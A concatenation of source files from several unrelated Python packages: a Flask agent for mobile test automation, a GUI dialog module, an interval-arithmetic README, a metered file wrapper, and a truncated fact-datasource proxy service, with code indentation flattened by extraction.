"Zorrilla",
"Zurita",
"Águila",
"Álamo",
"Álvarez",
"Álvaro",
"Ángel",
"Ávila",
)
prefixes = ("de", "del") | PypiClean |
/HuTao%20agent-1.0.3.tar.gz/HuTao agent-1.0.3/walnut_agent/script/flask_client.py |
# @File : flask_client.py
# @Date : 2022-02-08
# @Author : chenbo
__author__ = 'chenbo'
import argparse
import threading
import time
import sys
from loguru import logger
from flask import Flask, request, jsonify, Response
from fast_dict import Dictionary
from walnut_agent.common import do_monkeylog, do_json
from walnut_agent.script.agent import iOS_monkey_start, iOS_monkey_shutdown
from walnut_agent.script.util_handle import route, setting
from walnut_agent.script import http_handle, agent
from walnut_agent.script.app_handle import tid, add
from typing import Any
def respModel(result, isCheck=True):
if str(result).find("失败") != -1 and isCheck is True:
return do_json.dumps({"code": "8020", "msg": None, "success": False, "result": result, "tid": None, "ext": None})
else:
return do_json.dumps({"code": "8000", "msg": None, "success": True, "result": result, "tid": None, "ext": None})
class JsonResponse(Response):
@classmethod
def force_type(
cls, response: "Response", environ=None
) -> "JsonResponse":
if isinstance(response, (list, dict)):
response = jsonify(response)
return super(Response, cls).force_type(response, environ)
class FlaskApp(Flask):
def __init__(self, *args, **kwargs):
super(FlaskApp, self).__init__(*args, **kwargs)
def run(
self,
host: str = None,
port: int = None,
debug: bool = None,
load_dotenv: bool = True,
**options: Any,
) -> None:
self._activate_background_job(host, port)
super().run(host, port, debug, load_dotenv, **options)
def _activate_background_job(self,
host: str = None,
port: int = None,
):
"""
连接主服务器 heartbeat
"""
def run_job():
time.sleep(3)
http_handle.master_service.join_client(host, port, setting.agent.name)
t1 = threading.Thread(target=run_job)
t1.start()
app = FlaskApp(__name__)
app.response_class = JsonResponse
app.config["JSON_AS_ASCII"] = False
connected = {
"ios": ''
}
@app.route('/', methods=["GET"])
def home():
"""
返回所有接口的简易信息
"""
data = Dictionary({
"local": setting.agent.ip,
"path": Dictionary({
"root": route.BASE_DIR.__str__(),
"script": route.SCRIPT_PATH.__str__(),
"log": route.LOG_PATH.__str__(),
"report": route.REPORT_PATH.__str__(),
"export": route.EXPORT_PATH.__str__()
}),
"api": [
{
"path": "/runner",
"args": {
"task": "int"
},
"help": "执行任务"
},
{
"path": "/udid",
"args": {
},
"help": "获取已连接状态的设备id"
}
]
})
return data
@app.route('/runner', methods=["GET"])
def runner():
"""
执行任务
参数: task: int 任务id
"""
data = Dictionary({
"succeed": True,
"msg": "",
"data": None
})
if request.args is None:
data["succeed"] = False
data["msg"] = "请输入需要运行的任务id"
else:
task: str = request.args.to_dict().setdefault("task", None)
data["data"] = agent.run_task(task_id=task)
return data
@app.route('/udid', methods=["GET"])
def udid():
"""
获取已连接状态的设备id
"""
state = http_handle.wda_state.state()
data = Dictionary({
"iOS": tid.get_info(),
"Android": add.get_info(),
"ios_connected": connected["ios"] if state else ''
})
return respModel(data)
@app.route('/start_wda', methods=["GET"])
def start_wda():
data = Dictionary({
"msg": "请求成功"
})
if request.args is None:
data["msg"] = "参数udid不能为空"
else:
req: dict = request.args.to_dict()
udid: str = req.setdefault("udid", None)
if udid and udid in tid.get_devices():
connected["ios"] = udid
data["msg"] = agent.iOS_wda_start(udid)
else:
data["msg"] = "设备不存在或未连接"
return data
@app.route('/ios_monkey', methods=["GET"])
def ios_monkey():
udid = request.args.get("udid")
appid = request.args.get("appid")
duration = request.args.get("duration")
throttle = request.args.get("throttle")
yppno = request.args.get("yppno")
tester = request.args.get("tester")
monkey_msg = iOS_monkey_start(udid, appid, duration, yppno, tester, throttle)
return respModel(monkey_msg)
@app.route('/ios_monkey_shutdown', methods=["GET"])
def ios_monkey_shutdown():
thread_id = request.args.get("thread_id")
record_id = request.args.get("record_id")
monkey_msg = iOS_monkey_shutdown(record_id, thread_id)
return respModel(monkey_msg)
@app.route('/end_wda', methods=["GET"])
def end_wda():
data = Dictionary({
"msg": "请求成功"
})
tid.end_wda()
connected["ios"] = ''
return data
@app.route('/status_wda', methods=["GET"])
def status_wda():
state = http_handle.wda_state.state()
data = Dictionary({
"state": state
})
return data
@app.route('/ios_info', methods=["GET"])
def ios_info():
data = Dictionary({
"list": tid.get_info()
})
return data
@app.route('/collect_ios_monkey_log', methods=["GET"])
def collect_ios_monkey_log():
record_id = request.args.get("record_id")
return respModel(do_monkeylog.collect_ios_monkey_log(record_id))
def main():
parser = argparse.ArgumentParser(description="")
parser.add_argument(
'-V', '--version', dest='version', action='store_true',
help="show version")
parser.add_argument(
'-D', '--debug', dest='debug', action='store_true',
help="show version")
args = parser.parse_args()
if args.version:
from ..__about__ import __version__
msg = f"HuTao Version:{__version__}"
print(msg)
exit(0)
log_file = route.BASE_DIR / 'runtime' / 'agent{time}.log'
# 日志等级从低到高的顺序是: DEBUG < INFO < WARNING < ERROR < CRITICAL
config = {
"handlers": [
{"sink": sys.stdout, "format": "{time:YYYY-MM-DD at HH:mm:ss} | {level} | {message}",
"backtrace": True,
"level": 'WARNING',
"diagnose": True},
# 输出日志到文件
# rotation 滚动日志大小,retention 日志的保留时长, compression 文件压缩格式, serialize 日志序列化为JSON
{"sink": log_file,
"backtrace": True,
"serialize": False,
"rotation": "500 MB", "retention": "3 days", "compression": "zip"},
],
"extra": {"user": "someone"}
}
logger.configure(**config)
# 开启debug模式
flask_debug = False
if args.debug:
flask_debug = True
# 上报IP和端口到master服务器
app.run(
host="0.0.0.0",
port=setting.agent.port,
debug=flask_debug
)
if __name__ == '__main__':
main() | PypiClean |
/Eden-2.1.14.zip/Eden-2.1.14/eden/tutorialWinForms/projectionsDynamic/pdProjectionDialog.py |
# pdProjectionDialog.py
from org.qquick.eden import *
from pdAddPointsDialog import *
from pdRemovePointsDialog import *
from pdEditPointsDialog import *
class ProjectionDialog (Module):
def __init__ (self, main, viewStore):
self.main = main
main.nrOfProjectionsNode.follow (main.nrOfProjectionsNode.old + 1)
currentViewStore.value = viewStore
Module.__init__ (self, 'projectionDialog', True)
viewStore.load ()
def defineModules (self):
self.addPointsDialog = self.addModule (AddPointsDialog (self))
self.removePointsDialog = self.addModule (RemovePointsDialog (self))
self.editPointsDialog = self.addModule (EditPointsDialog (self))
def defineNodes (self):
self.pointsNode = Node ()
self.selectedPointsNode = Node ([])
self.sortColumnNumberNode = Node (0)
self.doAddPointsNode = Node (None)
self.doRemovePointsNode = Node (None)
self.doEditPointsNode = Node (None)
self.doCloseNode = Node (None)
self.doExitNode = Node (None)
def defineDependencies (self):
self.pointsNode.dependsOn (
[self.main.pointsNode, self.sortColumnNumberNode],
lambda: sortList (self.main.pointsNode.new, self.sortColumnNumberNode.new)
)
def defineViews (self):
return ModelessView (
VGridView ([
LLabelView ('All points'),
HGridView ([
ListView (
self.pointsNode,
PointColumnLabels,
selectedListNode = self.selectedPointsNode,
key = 'projectionPointsList',
sortColumnNumberNode = self.sortColumnNumberNode
),
HExtensionView (), HExtensionView (),
VGridView ([
ButtonView (self.doAddPointsNode, 'Add', hint = 'Add a range of points'),
ButtonView (self.doRemovePointsNode, 'Remove', hint = 'Remove the selected points'),
ButtonView (self.doEditPointsNode, 'Edit', 'Edit the selected points'),
StretchView (),
ButtonView (self.doCloseNode, 'Close', 'Close this projection view')
])
])
]),
'ProjectionDialog',
fixedSize = True,
key = 'Projection view',
exitActionNode = self.doExitNode
)
def defineActions (self):
self.doAddPointsNode.action = self.addPointsDialog.getView () .execute
self.doRemovePointsNode.action = self.removePointsDialog.getView () .execute
self.doEditPointsNode.action = self.editPointsDialog.getView () .execute
self.doCloseNode.action = self.getView () .exit
self.doExitNode.action = lambda: self.main.nrOfProjectionsNode.follow (self.main.nrOfProjectionsNode.old - 1) | PypiClean |
/IntervalArithmetic-0.2.0.tar.gz/IntervalArithmetic-0.2.0/README.html | <?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="generator" content="Docutils 0.13.1: http://docutils.sourceforge.net/" />
<title>IntervalArithmetic</title>
<style type="text/css">
/*
:Author: David Goodger ([email protected])
:Id: $Id: html4css1.css 7952 2016-07-26 18:15:59Z milde $
:Copyright: This stylesheet has been placed in the public domain.
Default cascading style sheet for the HTML output of Docutils.
See http://docutils.sf.net/docs/howto/html-stylesheets.html for how to
customize this style sheet.
*/
/* used to remove borders from tables and images */
.borderless, table.borderless td, table.borderless th {
border: 0 }
table.borderless td, table.borderless th {
/* Override padding for "table.docutils td" with "! important".
The right padding separates the table cells. */
padding: 0 0.5em 0 0 ! important }
.first {
/* Override more specific margin styles with "! important". */
margin-top: 0 ! important }
.last, .with-subtitle {
margin-bottom: 0 ! important }
.hidden {
display: none }
.subscript {
vertical-align: sub;
font-size: smaller }
.superscript {
vertical-align: super;
font-size: smaller }
a.toc-backref {
text-decoration: none ;
color: black }
blockquote.epigraph {
margin: 2em 5em ; }
dl.docutils dd {
margin-bottom: 0.5em }
object[type="image/svg+xml"], object[type="application/x-shockwave-flash"] {
overflow: hidden;
}
/* Uncomment (and remove this text!) to get bold-faced definition list terms
dl.docutils dt {
font-weight: bold }
*/
div.abstract {
margin: 2em 5em }
div.abstract p.topic-title {
font-weight: bold ;
text-align: center }
div.admonition, div.attention, div.caution, div.danger, div.error,
div.hint, div.important, div.note, div.tip, div.warning {
margin: 2em ;
border: medium outset ;
padding: 1em }
div.admonition p.admonition-title, div.hint p.admonition-title,
div.important p.admonition-title, div.note p.admonition-title,
div.tip p.admonition-title {
font-weight: bold ;
font-family: sans-serif }
div.attention p.admonition-title, div.caution p.admonition-title,
div.danger p.admonition-title, div.error p.admonition-title,
div.warning p.admonition-title, .code .error {
color: red ;
font-weight: bold ;
font-family: sans-serif }
/* Uncomment (and remove this text!) to get reduced vertical space in
compound paragraphs.
div.compound .compound-first, div.compound .compound-middle {
margin-bottom: 0.5em }
div.compound .compound-last, div.compound .compound-middle {
margin-top: 0.5em }
*/
div.dedication {
margin: 2em 5em ;
text-align: center ;
font-style: italic }
div.dedication p.topic-title {
font-weight: bold ;
font-style: normal }
div.figure {
margin-left: 2em ;
margin-right: 2em }
div.footer, div.header {
clear: both;
font-size: smaller }
div.line-block {
display: block ;
margin-top: 1em ;
margin-bottom: 1em }
div.line-block div.line-block {
margin-top: 0 ;
margin-bottom: 0 ;
margin-left: 1.5em }
div.sidebar {
margin: 0 0 0.5em 1em ;
border: medium outset ;
padding: 1em ;
background-color: #ffffee ;
width: 40% ;
float: right ;
clear: right }
div.sidebar p.rubric {
font-family: sans-serif ;
font-size: medium }
div.system-messages {
margin: 5em }
div.system-messages h1 {
color: red }
div.system-message {
border: medium outset ;
padding: 1em }
div.system-message p.system-message-title {
color: red ;
font-weight: bold }
div.topic {
margin: 2em }
h1.section-subtitle, h2.section-subtitle, h3.section-subtitle,
h4.section-subtitle, h5.section-subtitle, h6.section-subtitle {
margin-top: 0.4em }
h1.title {
text-align: center }
h2.subtitle {
text-align: center }
hr.docutils {
width: 75% }
img.align-left, .figure.align-left, object.align-left, table.align-left {
clear: left ;
float: left ;
margin-right: 1em }
img.align-right, .figure.align-right, object.align-right, table.align-right {
clear: right ;
float: right ;
margin-left: 1em }
img.align-center, .figure.align-center, object.align-center {
display: block;
margin-left: auto;
margin-right: auto;
}
table.align-center {
margin-left: auto;
margin-right: auto;
}
.align-left {
text-align: left }
.align-center {
clear: both ;
text-align: center }
.align-right {
text-align: right }
/* reset inner alignment in figures */
div.align-right {
text-align: inherit }
/* div.align-center * { */
/* text-align: left } */
.align-top {
vertical-align: top }
.align-middle {
vertical-align: middle }
.align-bottom {
vertical-align: bottom }
ol.simple, ul.simple {
margin-bottom: 1em }
ol.arabic {
list-style: decimal }
ol.loweralpha {
list-style: lower-alpha }
ol.upperalpha {
list-style: upper-alpha }
ol.lowerroman {
list-style: lower-roman }
ol.upperroman {
list-style: upper-roman }
p.attribution {
text-align: right ;
margin-left: 50% }
p.caption {
font-style: italic }
p.credits {
font-style: italic ;
font-size: smaller }
p.label {
white-space: nowrap }
p.rubric {
font-weight: bold ;
font-size: larger ;
color: maroon ;
text-align: center }
p.sidebar-title {
font-family: sans-serif ;
font-weight: bold ;
font-size: larger }
p.sidebar-subtitle {
font-family: sans-serif ;
font-weight: bold }
p.topic-title {
font-weight: bold }
pre.address {
margin-bottom: 0 ;
margin-top: 0 ;
font: inherit }
pre.literal-block, pre.doctest-block, pre.math, pre.code {
margin-left: 2em ;
margin-right: 2em }
pre.code .ln { color: grey; } /* line numbers */
pre.code, code { background-color: #eeeeee }
pre.code .comment, code .comment { color: #5C6576 }
pre.code .keyword, code .keyword { color: #3B0D06; font-weight: bold }
pre.code .literal.string, code .literal.string { color: #0C5404 }
pre.code .name.builtin, code .name.builtin { color: #352B84 }
pre.code .deleted, code .deleted { background-color: #DEB0A1}
pre.code .inserted, code .inserted { background-color: #A3D289}
span.classifier {
font-family: sans-serif ;
font-style: oblique }
span.classifier-delimiter {
font-family: sans-serif ;
font-weight: bold }
span.interpreted {
font-family: sans-serif }
span.option {
white-space: nowrap }
span.pre {
white-space: pre }
span.problematic {
color: red }
span.section-subtitle {
/* font-size relative to parent (h1..h6 element) */
font-size: 80% }
table.citation {
border-left: solid 1px gray;
margin-left: 1px }
table.docinfo {
margin: 2em 4em }
table.docutils {
margin-top: 0.5em ;
margin-bottom: 0.5em }
table.footnote {
border-left: solid 1px black;
margin-left: 1px }
table.docutils td, table.docutils th,
table.docinfo td, table.docinfo th {
padding-left: 0.5em ;
padding-right: 0.5em ;
vertical-align: top }
table.docutils th.field-name, table.docinfo th.docinfo-name {
font-weight: bold ;
text-align: left ;
white-space: nowrap ;
padding-left: 0 }
/* "booktabs" style (no vertical lines) */
table.docutils.booktabs {
border: 0px;
border-top: 2px solid;
border-bottom: 2px solid;
border-collapse: collapse;
}
table.docutils.booktabs * {
border: 0px;
}
table.docutils.booktabs th {
border-bottom: thin solid;
text-align: left;
}
h1 tt.docutils, h2 tt.docutils, h3 tt.docutils,
h4 tt.docutils, h5 tt.docutils, h6 tt.docutils {
font-size: 100% }
ul.auto-toc {
list-style-type: none }
</style>
</head>
<body>
<div class="document" id="intervalarithmetic">
<h1 class="title">IntervalArithmetic</h1>
<!-- -*- Mode: rst -*- -->
<!-- -*- Mode: rst -*- -->
<!-- |IntervalArithmeticUrl|
|IntervalArithmeticHomePage|_
|IntervalArithmeticDoc|_
|IntervalArithmetic@github|_
|IntervalArithmetic@readthedocs|_
|IntervalArithmetic@readthedocs-badge|
|IntervalArithmetic@pypi|_ -->
<!-- .. _IntervalArithmetic@github: https://github.com/FabriceSalvaire/python-interval-arithmetic -->
<!-- .. _IntervalArithmetic@pypi: https://pypi.python.org/pypi/IntervalArithmetic -->
<!-- coverage test -->
<!-- https://img.shields.io/pypi/status/Django.svg -->
<!-- https://img.shields.io/github/stars/badges/shields.svg?style=social&label=Star -->
<!-- End -->
<!-- -*- Mode: rst -*- -->
<!-- End -->
<p><a class="reference external" href="https://pypi.python.org/pypi/IntervalArithmetic"><object data="https://img.shields.io/pypi/l/IntervalArithmetic.svg" type="image/svg+xml">IntervalArithmetic license</object></a>
<a class="reference external" href="https://pypi.python.org/pypi/IntervalArithmetic"><object data="https://img.shields.io/pypi/pyversions/IntervalArithmetic.svg" type="image/svg+xml">IntervalArithmetic python version</object></a></p>
<p><a class="reference external" href="https://pypi.python.org/pypi/IntervalArithmetic"><object data="https://img.shields.io/pypi/v/IntervalArithmetic.svg" type="image/svg+xml">IntervalArithmetic last version</object></a></p>
<ul class="simple">
<li>Quick Link to <a class="reference external" href="https://github.com/FabriceSalvaire/python-interval-arithmetic/tree/master">Production Branch</a></li>
<li>Quick Link to <a class="reference external" href="https://github.com/FabriceSalvaire/python-interval-arithmetic/tree/devel">Devel Branch</a></li>
</ul>
<div class="section" id="overview">
<h1>Overview</h1>
<div class="section" id="what-is-intervalarithmetic">
<h2>What is IntervalArithmetic ?</h2>
<p>IntervalArithmetic is a free and open source (*) interval arithmetic package for <a class="reference external" href="http://python.org">Python</a>.</p>
</div>
<div class="section" id="where-is-the-documentation">
<h2>Where is the Documentation ?</h2>
<p>The documentation is available on the <a class="reference external" href="https://fabricesalvaire.github.io/python-interval-arithmetic">IntervalArithmetic Home Page</a>.</p>
<!-- What are the main features ?
- - - - - - - - - - - - - - - - - - - - - - - - - - - -
* to be completed ... -->
</div>
<div class="section" id="how-to-install-it">
<h2>How to install it ?</h2>
<p>Look at the <a class="reference external" href="https://fabricesalvaire.github.io/IntervalArithmetic/installation.html">installation</a> section in the documentation.</p>
</div>
</div>
<div class="section" id="credits">
<h1>Credits</h1>
<p>Authors: <a class="reference external" href="http://fabrice-salvaire.fr">Fabrice Salvaire</a></p>
</div>
<div class="section" id="news">
<h1>News</h1>
<!-- -*- Mode: rst -*- -->
<!-- no title here -->
<div class="section" id="v0-2-2017-11-10">
<h2>V0.2 2017-11-10</h2>
</div>
</div>
</div>
</body>
</html> | PypiClean |
/MTGProxyPrinter-0.25.0.tar.gz/MTGProxyPrinter-0.25.0/mtg_proxy_printer/metered_file.py |
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from typing import Iterable, List, Optional, BinaryIO, Union
from io import BufferedIOBase
from PyQt5.QtCore import QObject, pyqtSignal as Signal
from delegateto import delegate
from mtg_proxy_printer.logger import get_logger
logger = get_logger(__name__)
del get_logger
__all__ = [
"MeteredFile",
]
WrappedIoType = Union[BufferedIOBase, BinaryIO]
@delegate(
"file",
# IOBase and BufferedIOBase methods
"seekable", "readable", "writable", "close", "fileno", "flush", "isatty", "tell", "truncate", "detach", # noqa
)
class MeteredFile(QObject):
"""
Takes a file-like object and monitors read and write progress.
"""
io_begin = Signal(int)
total_bytes_processed = Signal(int)
io_end = Signal()
def __init__(self, file: WrappedIoType, expected_size_bytes: int = 0, parent: QObject = None):
logger.debug(f"Creating {self.__class__.__name__} instance.")
super(MeteredFile, self).__init__(parent)
self.file = file
self._total_bytes_processed = 0
self.expected_size_bytes = expected_size_bytes
logger.debug(f"Created {self.__class__.__name__} instance.")
def __enter__(self):
self.io_begin.emit(self.expected_size_bytes)
return self
def __exit__(self, exc_type, exc_val, exc_tb) -> Optional[bool]:
try:
result = self.file.__exit__(exc_type, exc_val, exc_tb)
finally:
self.io_end.emit()
return result
def _processed(self, byte_count: int):
self._total_bytes_processed += byte_count
self.total_bytes_processed.emit(self._total_bytes_processed)
def seek(self, __offset: int, __whence: int = None):
self.file.seek(__offset, __whence)
self._total_bytes_processed = __offset
self.total_bytes_processed.emit(self._total_bytes_processed)
def read(self, __size: Optional[int] = None) -> bytes:
buffer = self.file.read(__size)
self._processed(len(buffer))
return buffer
def read1(self, __size: int = None) -> bytes:
buffer = self.file.read1(__size)
self._processed(len(buffer))
return buffer
def readinto(self, __buffer) -> int:
bytes_read = self.file.readinto(__buffer)
self._processed(bytes_read)
return bytes_read
def readinto1(self, __buffer) -> int:
bytes_read = self.file.readinto1(__buffer)
self._processed(bytes_read)
return bytes_read
def readline(self, __size: Optional[int] = None) -> bytes:
line = self.file.readline(__size)
self._processed(len(line))
return line
def readlines(self, __hint: int = None) -> List[bytes]:
lines = self.file.readlines(__hint)
total_bytes = sum(map(len, lines))
self._processed(total_bytes)
return lines
def write(self, __buffer) -> int:
bytes_written = self.file.write(__buffer)
self._processed(bytes_written)
return bytes_written
def writelines(self, __lines: Iterable[bytes]) -> None:
def _monitor(__lines: Iterable[bytes]):
for line in __lines:
yield line
self._processed(len(line))
self.file.writelines(_monitor(__lines)) | PypiClean |
/FicusFramework-3.1.0.post2.tar.gz/FicusFramework-3.1.0.post2/src/factdatasource/FactDatasourceProxyService.py | import logging
from abc import abstractmethod
import requests
from munch import Munch
from api.exceptions import ServiceInnerException, IllegalArgumentException, AuthException
from api.model.FactDatasourceQueryParameter import FactDatasourceQueryParameter
from client import check_instance_avaliable, do_service
from config.annotation import Value
from factdatasource.FactDatasourceContext import FactDatasourceContext
from factdatasource.FactDatasourceContextHolder import FactDatasourceContextHolder
from libs import HeaderHolder
from libs.utils import Singleton
from service.FactDatasourceService import FactDatasourceService
log = logging.getLogger('Ficus')
class FactDatasourceProxy(object):
@abstractmethod
def fd(self, fd_code: str):
"""
返回fd对象
:param fd_code:
:return: FactDatasource
"""
@abstractmethod
def size(self, fd_code: str):
"""
返回数据总长度
:param fd_code:
:return: 数据条数:long
"""
@abstractmethod
def is_empty(self, fd_code: str):
"""
返回是否存在数据
:param fd_code:
:return: boolean
"""
@abstractmethod
def collect(self, fd_code: str, offset: int, size: int, only_model_field: bool):
"""
返回指定条数的数据
:param offset:
:param only_model_field:
:param fd_code:
:param size: 返回的条数
:return: list
"""
@abstractmethod
def collect_conditions(self, fd_code: str, offset: int, size: int, condition_groups: list, only_model_field: bool):
"""
返回指定查询条件的数据
:param offset:
:param only_model_field:
:param fd_code:
:param size: 返回的条数
:param condition_groups: 查询条件
:return: list
"""
@abstractmethod
def query(self, fd_code: str, query: str, parameters: dict):
"""
使用查询语句查询数据
:param fd_code:
:param query: 查询语句
:param parameters: 查询参数
:return: Page
"""
@abstractmethod
def query_data(self, fd_code: str, query: str, parameters: dict):
"""
使用查询语句查询数据
:param fd_code:
:param query: 查询语句
:param parameters: 查询参数
:return: Page
"""
@abstractmethod
def inserts(self, fd_code: str, result_list: list) -> list:
"""
批量保存数据,要求list里面的字段和数据库里面的字段一一对应
:param fd_code:
:param result_list: 要保存的数据
:return:
"""
@abstractmethod
def updates(self, fd_code: str, result_list: list) -> list:
"""
批量更新数据,要求list里面的字段和数据库里面的字段一一对应
采用ByPrimaryKeySelective的方式,也就是主键必填,其他的字段非空就是要修改的
:param fd_code:
:param result_list: 要修改的数据
:return:
"""
@abstractmethod
def save_or_updates(self, fd_code: str, result_list: list) -> list:
"""
批量saveOrUpdate数据,,数据,要求list里面的字段和数据库里面的字段一一对应
采用ByPrimaryKeySelective的方式,也就是主键必填,其他的字段非空就是要修改的
:param fd_code:
:param result_list: 要添加或者需要修改的数据
:return:
"""
@abstractmethod
def delete_all(self, fd_code: str):
"""
清空数据
:param fd_code:
:return:
"""
@abstractmethod
def delete(self, fd_code: str, query: str):
"""
根据删除语句删除数据,query是完整的删除语句
:param fd_code:
:param query:
:return:
"""
@abstractmethod
def delete_conditions(self, fd_code: str, condition_groups: list):
"""
根据删除条件,构造删除语句
:param fd_code:
:param condition_groups:
:return:
"""
# @abstractmethod
# def get_fact_datasource_fields(self, fd_code: str):
# """
# 这个python版暂时用不到,先不实现
# 获取fd的字段
# :param fd_code:
# :return: List<FactDatasourceField>
# """
@abstractmethod
def exists_fds(self, fd_codes: list) -> bool:
"""
判断fd是否存在
:param fd_codes:
:return:
"""
class DistributedFactDatasourceProxy(FactDatasourceProxy, Singleton):
"""
本地直接使用FD操作数据库的方式
"""
def fd(self, fd_code: str):
"""
返回fd对象
:param fd_code:
:return: FactDatasource
"""
return self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE), fd_code).fd()
def size(self, fd_code: str):
"""
返回数据总长度
:param fd_code:
:return: 数据条数:long
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'read')
return fd_context.size()
def is_empty(self, fd_code: str):
"""
返回是否存在数据
:param fd_code:
:return: boolean
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'read')
return fd_context.is_empty()
def collect(self, fd_code: str, offset: int, size: int, only_model_field: bool = False):
"""
返回指定条数的数据
:param offset:
:param only_model_field:
:param fd_code:
:param size: 返回的条数
:return: list
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'read')
result = fd_context.collect(size)
# 这里需要对查询结果做字段过滤
self._inner_field_permission(fd_context, result, only_model_field)
return result
def collect_conditions(self, fd_code: str, offset: int, size: int, condition_groups: list, only_model_field: bool = False):
"""
返回指定条数的数据
:param offset:
:param only_model_field:
:param fd_code:
:param size: 返回的条数
:param condition_groups: 查询条件
:return: list
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'read')
result = fd_context.collect_conditions(size, condition_groups)
# 这里需要对查询结果做字段过滤
self._inner_field_permission(fd_context, result, only_model_field)
return result
def query(self, fd_code: str, query: str, parameters: dict):
"""
使用查询语句查询数据
:param fd_code:
:param query: 查询语句
:param parameters: 查询参数
:return: Page
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'read')
result = fd_context.query(query, parameters)
# 这里需要对查询结果做字段过滤
self._inner_field_permission(fd_context, result, False)
return result
def query_data(self, fd_code: str, query: str, parameters: dict):
self.query(fd_code, query, parameters)
def inserts(self, fd_code: str, result_list: list) -> list:
"""
批量保存数据,要求list里面的字段和数据库里面的字段一一对应
:param fd_code:
:param result_list: 要保存的数据
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'write')
return fd_context.inserts(result_list)
def updates(self, fd_code: str, result_list: list) -> list:
"""
批量更新数据,要求list里面的字段和数据库里面的字段一一对应
采用ByPrimaryKeySelective的方式,也就是主键必填,其他的字段非空就是要修改的
:param fd_code:
:param result_list: 要修改的数据
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'write')
return fd_context.updates(result_list)
def save_or_updates(self, fd_code: str, result_list: list) -> list:
"""
批量saveOrUpdate数据,,数据,要求list里面的字段和数据库里面的字段一一对应
采用ByPrimaryKeySelective的方式,也就是主键必填,其他的字段非空就是要修改的
:param fd_code:
:param result_list: 要添加或者需要修改的数据
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'write')
return fd_context.inserts_or_updates(result_list)
def delete_all(self, fd_code: str):
"""
清空数据
:param fd_code:
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'delete')
return fd_context.delete_all()
def delete(self, fd_code: str, query: str):
"""
根据删除语句删除数据,query是完整的删除语句
:param fd_code:
:param query:
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'delete')
return fd_context.delete(query)
def delete_conditions(self, fd_code: str, condition_groups: list):
"""
根据删除条件,构造删除语句
:param fd_code:
:param condition_groups: 传入的是 ConditionGroup对象
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'delete')
return fd_context.delete_conditions(condition_groups)
# def get_fact_datasource_fields(self, fd_code: str):
# """
# 获取fd的字段
# :param fd_code:
# :return: List<FactDatasourceField>
# """
# fd_context = self._get_fd_context(fd_code)
# self._inner_check_permission(fd_context, 'execute')
# return fd_context.get_fact_datasource_fields()
def exists_fds(self, fd_codes: list) -> bool:
"""
判断fd是否存在
:param fd_codes:
:return:
"""
if not fd_codes:
return False
if not isinstance(fd_codes, list):
raise IllegalArgumentException("检测fd是否存在失败,输入参数不是一个list")
fd_service = FactDatasourceService.instance()
return fd_service.exists_fds(HeaderHolder.get_value(HeaderHolder.SITE),
HeaderHolder.get_value(HeaderHolder.PROJECT_CODE), fd_codes)
def _get_fd_context(self, site: str, project_code: str, fd_code: str):
fd_context: FactDatasourceContext = FactDatasourceContextHolder.instance().get_fact_datasource(site,project_code,fd_code)
return fd_context
def _inner_check_permission(self, fd_context: FactDatasourceContext, operation: str):
# TODO 暂未实现内容权限验证
return True
def _inner_field_permission(self, fd_context, result, only_model_field):
# TODO 暂未实现内容权限验证及只返回模型有的字段
return True
class CentralizedFactDatasourceProxy(FactDatasourceProxy, Singleton):
"""
集中式的FD获取,也就是传统的 调用ficus-web的方式来获取fd
"""
def fd(self, fd_code: str):
"""
获取某一个FD对象
:param fd_code: fd的唯一code
:return: FD对象
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
return Munch(r)
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
